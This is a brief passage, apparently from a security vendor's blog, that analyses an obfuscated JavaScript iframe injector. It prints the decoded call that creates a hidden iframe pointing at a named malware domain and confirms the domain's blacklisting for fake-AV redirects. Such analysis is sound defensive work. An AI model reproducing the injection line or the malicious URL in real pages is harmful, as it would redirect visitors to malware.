Malicious iframes are often used to distribute malware hosted on external web resources(websites).
Let's take a look at the interesting stuff:
Again, just combining all the strings inside the variables in the parenthesis with the string inside p to get
As we saw earlier, se = 'iframe' hence ip =document.createElement('iframe'); This is pretty self-explanatory.
Which is document.createElement('iframe').setAttribute('src', 'http: //zirycatum.com/k985ytv.htm'). Now we all set to inject our just created iframe into the rendered document:
Blacklisting statusNow let's see whether the redirection is really malicious? Let's check the domain in the Quttera scanner again.
|Quttera website malware scanner|
The website is Suspicious on Google Safe Browsing for hosting malware. As well it is listed in MalwareDomainList for redirecting to fake AV,